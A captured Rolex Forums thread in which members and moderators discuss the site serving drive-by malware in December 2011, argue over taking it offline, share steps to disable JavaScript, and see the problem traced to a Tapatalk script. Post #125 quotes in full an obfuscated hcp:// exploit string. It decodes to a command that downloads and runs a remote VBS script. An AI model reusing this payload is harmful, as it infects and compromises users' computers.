The Rolex Forums   The Rolex Watch

ROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEX


Go Back   Rolex Forums - Rolex Forum > Miscellaneous Forums > Announcements/feedback & support

Reply
 
Thread Tools Display Modes
Old 10 December 2011, 11:37 AM   #121
gregmoeck
"TRF" Member
 
gregmoeck's Avatar
 
Join Date: Mar 2010
Location: Maui
Watch: Patek
Posts: 2,032
sorry if i came off harsh, i know its tough to fix these server side issues, hang in there
gregmoeck is offline   Reply With Quote
Old 10 December 2011, 11:41 AM   #122
Mickey®
Banned
 
Join Date: Aug 2011
Real Name: Mickey®
Location: Atlanta, GA
Watch: Swiss Made
Posts: 5,801
Quote:
Originally Posted by gregmoeck View Post
damn microsoft, i use linux downstairs and never have a problem. i come upstairs and use my windows netbook and now its infected. microsoft security essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until issue is fixed to prevent others from getting thier home pc's compromised. Leaving this up all day probably infected a ton of workstations across the globe.
I'm on a Google Chrome Operating system Laptop...So it isn't Microsoft exactly...
Mickey® is offline   Reply With Quote
Old 10 December 2011, 11:44 AM   #123
dsio
"TRF" Member
 
dsio's Avatar
 
Join Date: Jun 2010
Real Name: Ashley
Location: Brisbane
Watch: Rolex Sub 1680 '79
Posts: 2,301
Quote:
Originally Posted by gregmoeck View Post
damn microsoft, i use linux downstairs and never have a problem. i come upstairs and use my windows netbook and now its infected. microsoft security essentials just cleaned exploit:JS/Blacloe.AC which I got from this forum. You should shut down the forum until issue is fixed to prevent others from getting thier home pc's compromised. Leaving this up all day probably infected a ton of workstations across the globe.
This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.
__________________
-- Omega Seamaster Grand-Lux Stepped Pie-Pan 14K Gold OJ2627 '53 --
-- Omega Cal 320 Chronograph 18K Gold OT2872 '58 --
-- Omega Cal 321 Speedmaster Pro 145.012 '67 --
-- Rolex Submariner 1680 "Ghost" '79 --
-- Rolex SS Daytona 116520 '04 --
dsio is offline   Reply With Quote
Old 10 December 2011, 11:47 AM   #124
77T
2024 SubLV41 Pledge Member
 
77T's Avatar
 
Join Date: Dec 2010
Real Name: PaulG
Location: Georgia
Posts: 42,012
BTW a new exploit has surfaced to attack iPads running Safari. It just causes an overflow since the Java Trojan won't download to an iPad.

Just sharing in the spirit of teamwork.

iPads and iPhones running Tapatalk seem to still be fine. Have been using both with no problems

But I tried the iPad with Safari just to check. It ran for several minutes before picking up the probe and then it would just close Safari as the redirect tried to load the jar files.


Sent from my iPad using Tapatalk
__________________


Does anyone really know what time it is?
77T is online now   Reply With Quote
Old 10 December 2011, 11:49 AM   #125
LordNinja
"TRF" Member
 
LordNinja's Avatar
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
I thought so. Hmmm

Quote:
Originally Posted by gregmoeck View Post
sql database injection or some infection, passwords may be compromised, here is what i get now.



hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,4 7,99,32,101,99,104,111,32,66,61,34,108,46,118,98,1 15,34,58,87,105,116,104,32,67,114,101,97,116,101,7 9,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88, 77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,3 4,71,69,84,34,44,34,104,116,116,112,58,47,47,111,1 14,101,105,110,111,101,107,115,111,110,121,46,99,1 11,109,47,99,111,110,116,101,110,116,47,104,99,112 ,95,118,98,115,46,112,104,112,63,102,61,50,54,38,1 00,61,49,34,44,102,97,108,115,101,58,46,115,101,11 0,100,40,41,58,83,101,116,32,65,32,61,32,67,114,10 1,97,116,101,79,98,106,101,99,116,40,34,83,99,114, 105,112,116,105,110,103,46,70,105,108,101,83,121,1 15,116,101,109,79,98,106,101,99,116,34,41,58,83,10 1,116,32,68,61,65,46,67,114,101,97,116,101,84,101, 120,116,70,105,108,101,40,65,46,71,101,116,83,112, 101,99,105,97,108,70,111,108,100,101,114,40,50,41, 32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,1 05,116,101,76,105,110,101,32,46,114,101,115,112,11 1,110,115,101,84,101,120,116,58,69,110,100,32,87,1 05,116,104,58,68,46,67,108,111,115,101,58,67,114,1 01,97,116,101,79,98,106,101,99,116,40,34,87,83,99, 114,105,112,116,46,83,104,101,108,108,34,41,46,82, 117,110,32,65,46,71,101,116,83,112,101,99,105,97,1 08,70,111,108,100,101,114,40,50,41,32,43,32,34,92, 34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,10 8,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,9 2,108,46,118,98,115,32,38,38,32,116,97,115,107,107 ,105,108,108,32,47,70,32,47,73,77,32,104,101,108,1 12,99,116,114,46,101,120,101)));</script>
LordNinja is offline   Reply With Quote
Old 10 December 2011, 11:51 AM   #126
LordNinja
"TRF" Member
 
LordNinja's Avatar
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
Quote:
Originally Posted by dsio View Post
This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.
Sadly true.
LordNinja is offline   Reply With Quote
Old 10 December 2011, 11:53 AM   #127
LordNinja
"TRF" Member
 
LordNinja's Avatar
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
Sounds like we have a lot of other experienced It/networking people finally chiming in.
LordNinja is offline   Reply With Quote
Old 10 December 2011, 11:56 AM   #128
LordNinja
"TRF" Member
 
LordNinja's Avatar
 
Join Date: Aug 2008
Real Name: Chris
Location: Boston
Watch: 116610,116233,OsQz
Posts: 1,109
I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.
LordNinja is offline   Reply With Quote
Old 10 December 2011, 12:01 PM   #129
Rockrolex
TRF Moderator & 2024 SubLV41 Patron
 
Rockrolex's Avatar
 
Join Date: May 2005
Real Name: God
Location: Washington, D.C.
Watch: What do you think?
Posts: 37,966
Quote:
Originally Posted by Cru Jones View Post
my message:

"Symantec Endpoint Protection - [SID: 24225] - Web Attack: Blackhole Toolkit Website 5 detected."
I've been getting the same message for the past couple of days. Norton 360 has been blocking the attacks.
__________________
Despite the high cost of living, it's still very popular.

Tosser Cabinet Member

Official Member: 'Perpetual 30' Vegas International GTG 2016
Official Member "WIS-CON" Las Vegas International GTG 2017
Official Member "WIS-CON" Las Vegas International GTG 2018
Official Member "WIS-CON" Las Vegas International GTG 2019
Rockrolex is offline   Reply With Quote
Old 10 December 2011, 12:06 PM   #130
sleddog
TRF Moderator & 2024 SubLV41 Patron
 
sleddog's Avatar
 
Join Date: Jul 2007
Real Name: Rob
Location: Nearby.
Posts: 24,931
Quote:
Originally Posted by dsio View Post
This is absolutely correct...

The reason you're only getting 15% of users reporting it is that you have a lot of people running unsophisticated or older browsers like IE on this forum. There is a block of javascript code attempting to pull down a malware payload on every pageload on TRF.

You need to kill apache and point nginx to a holding page until this is over, every minute you try to keep the site up in its present state is doing damage to TRF users.
Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall/and or loggout from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent
Quote:
Originally Posted by LordNinja View Post
I am prob not the only one that felt I would enrage an admin/mod with my concern. Glad this is such an open place.:)

It pains me to see the forum have any issues at all but it happens.
The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!
__________________
He who wears a Rolex is always on time, even when late!!

TRF's "After Dark" Bar & Nightclub Patron-Founding Member..
sleddog is offline   Reply With Quote
Old 10 December 2011, 12:25 PM   #131
Grissom
"TRF" Member
 
Grissom's Avatar
 
Join Date: Oct 2010
Real Name: Nathan
Location: US, Latin America
Watch: GMT IIc 18K/SS
Posts: 3,349
I have been browsing with safari via my iPhone with no apparent issues so far.

While I hate to be without TRF for even a few minutes I also would be supportive of TRF being taken offline in order to clean things up so that those with less sophisticated or secure systems would not be unwittingly infected.

Many thanks to Steve, et al, for working towards a speedy resolution
__________________
(Member NAWCC since 1976)
116713LN GMT-IIc 18k/SS (Z) + 116520 SS Daytona (M) + 16700 GMT Master (A) + 16610LV Submariner (V) + 16600 Sea Dweller (Z) +
116400 Milgauss White Dial (V) + 70330N Tudor Heritage Chronograph Grey w/Black Sub Dials (J) + 5513 Submariner Serif Dial (5.2 Mil)

Who else needs an Intervention?
(109 297) (137 237) (73 115) (221) (23) (56) (229) P-Club Member #5

RIP JJ Irani - TRF Legend
Grissom is offline   Reply With Quote
Old 10 December 2011, 12:35 PM   #132
Rockrolex
TRF Moderator & 2024 SubLV41 Patron
 
Rockrolex's Avatar
 
Join Date: May 2005
Real Name: God
Location: Washington, D.C.
Watch: What do you think?
Posts: 37,966
I use IE with Verizon Yahoo as my browser on XP machines. I have no problem accessing TRF. The only issue I've had in the past two days was noted in post #129 above.

When I browse for Rolex Forum in Yahoo, TRF comes up immediately with no issues.

However, when I did a similar search using Google, I got the following message:

Quote:
Warning - visiting this web site may harm your computer!



Suggestions: Or you can continue to http://www.rolexforums.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

If you are the owner of this web site, you can request a review of your site using Google's Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Advisory provided by


This may be a Google problem more than a TRF problem.
__________________
Despite the high cost of living, it's still very popular.

Tosser Cabinet Member

Official Member: 'Perpetual 30' Vegas International GTG 2016
Official Member "WIS-CON" Las Vegas International GTG 2017
Official Member "WIS-CON" Las Vegas International GTG 2018
Official Member "WIS-CON" Las Vegas International GTG 2019
Rockrolex is offline   Reply With Quote
Old 10 December 2011, 12:52 PM   #133
Freelance
"TRF" Member
 
Freelance's Avatar
 
Join Date: Sep 2009
Location: USA
Watch: 1675
Posts: 171
Quote:
Originally Posted by sleddog View Post
Thanks for the point of view Ashley.
What I can suggest ATM is to up your firewall/and or loggout from the forum until this issue is resolved.
Personal commitments and an ongoing search for the source are persistent


The current position is, if you are having Malicious attacks, position your firewall appropriately....
This will be resolved in due time, rest assured!
Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.
Freelance is offline   Reply With Quote
Old 10 December 2011, 01:01 PM   #134
dsio
"TRF" Member
 
dsio's Avatar
 
Join Date: Jun 2010
Real Name: Ashley
Location: Brisbane
Watch: Rolex Sub 1680 '79
Posts: 2,301
Quote:
Originally Posted by Freelance View Post
Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.
If you go to view source you can see exactly where its being loaded, check on any page and do a find for "d.write", its where a heap of banners for watch top 100 lists used to be at the bottom of every page.
__________________
-- Omega Seamaster Grand-Lux Stepped Pie-Pan 14K Gold OJ2627 '53 --
-- Omega Cal 320 Chronograph 18K Gold OT2872 '58 --
-- Omega Cal 321 Speedmaster Pro 145.012 '67 --
-- Rolex Submariner 1680 "Ghost" '79 --
-- Rolex SS Daytona 116520 '04 --
dsio is offline   Reply With Quote
Old 10 December 2011, 01:11 PM   #135
sleddog
TRF Moderator & 2024 SubLV41 Patron
 
sleddog's Avatar
 
Join Date: Jul 2007
Real Name: Rob
Location: Nearby.
Posts: 24,931
Quote:
Originally Posted by Freelance View Post
Please do not take this the wrong way, but this is wrong and irresponsible.

I purposely and carefully surfed here using Firefox with the "noscript plugin" (forbidding rolexforums.com, and links) and java turned off.

"position your firewall appropriately" ??? Sorry, but firewalls DO NOT prevent drive by downloads. As long as you keep this site operational you ARE contributing to the possible infection of older, unpatched machines. (I pity the person who is surfing this forum with IE6).

The culprit could be hiding anywhere from "signatures" to "avatars", hidden iFrames.

As suggested, the site should be taken offline, or DNS pointed to a "Sorry" page.
This is not taken in "the wrong way".
My advice to you and anyone else receiving the warnings, is "to log out"!!!!

TRF is not holding you hostage to log in, nor is it doing nothing!!

All i'm asking is to keep the antagonism to yourself until the fix has been resolved!
There's more to it than you can see or fathom.

My post was an alternative, not a directive!!
__________________
He who wears a Rolex is always on time, even when late!!

TRF's "After Dark" Bar & Nightclub Patron-Founding Member..
sleddog is offline   Reply With Quote
Old 10 December 2011, 04:02 PM   #136
Lol-x
Facilitator
 
Lol-x's Avatar
 
Join Date: Nov 2005
Real Name: Steve
Location: Omnipresent
Posts: 33,587
Please be patient guys we are working on getting this resolved asap.

I hope the solution will be obtained shortly.

Please accept my apologies.

I do not have any evidence of compromised accounts or computers at this stage, it may be a false positive, but it is best to err on the side of caution.
__________________

Most folks are about as happy as they make up their minds to be. ~Abraham Lincoln
Nothing compares to the simple pleasure of a bike ride. ~John F. Kennedy

ROLEXploitation - yeah I'm a victim
Lol-x is offline   Reply With Quote
Old 10 December 2011, 06:27 PM   #137
2careless
"TRF" Member
 
2careless's Avatar
 
Join Date: Dec 2007
Location: Melbourne, AU
Watch: Pepsi
Posts: 4,370
Until there is a fix to the problem, it seems to me that by disabling scripting will disable the access of the malware.

In IE, this can be done by changing the security level of the browser:
1. Goto "Tools" -> "Internet Options", and select the "Security" tab
2. Select "Internet zone", tick "Enabled Protected Mode", select "Custom Level"
3. Scroll down the Settings to "Scripting" section:
4. Right under "Scripting", there is "Active scripting", either check Disable, or Prompt. Then click "OK" and "OK" to get out.
By choosing "Disable", some website may break, You can choose "Prompt" and make sure you say "no" in TRF.

In Firefox, it's easier:
1. goto "Tools" -> "Options"
2. goto "Content" tab at the top.
3. uncheck "Enable Javascript".

Hope this helps.

P.S. If you google "Disable Javascript in IE", there are several answers that contains malware by itself. Be careful!
2careless is offline   Reply With Quote
Old 11 December 2011, 12:40 PM   #138
Lol-x
Facilitator
 
Lol-x's Avatar
 
Join Date: Nov 2005
Real Name: Steve
Location: Omnipresent
Posts: 33,587
The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The google warning takes a day to remove, but everything is running properly as of now.
__________________

Most folks are about as happy as they make up their minds to be. ~Abraham Lincoln
Nothing compares to the simple pleasure of a bike ride. ~John F. Kennedy

ROLEXploitation - yeah I'm a victim
Lol-x is offline   Reply With Quote
Old 11 December 2011, 12:46 PM   #139
STEELINOX
2024 SubLV41 Pledge Member
 
STEELINOX's Avatar
 
Join Date: Oct 2008
Real Name: Sink-O!
Location: a praire in AZ
Watch: ROLEX-less atm...
Posts: 14,021
Quote:
Originally Posted by Lol-x View Post
The problem has been resolved.
It was related to a Tapatalk script.
Tapatalk has not been reinstalled at this stage.

The google warning takes a day to remove, but everything is running properly as of now.
Great news StevO !
__________________

*Positive Waves Baby*
Lug Hole Loyalist / Chamfer Line Inspector
INFORTHE WIN
SUB-MAH-REEEN-ER ~ !
STEELINOX is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

WatchesOff5th

DavidSW Watches

Takuya Watches

OCWatches

Asset Appeal

Wrist Aficionado

My Watch LLC


*Banners Of The Month*
This space is provided to horological resources.





Copyright ©2004-2024, The Rolex Forums. All Rights Reserved.

ROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEXROLEX

Rolex is a registered trademark of ROLEX USA. The Rolex Forums is not affiliated with ROLEX USA in any way.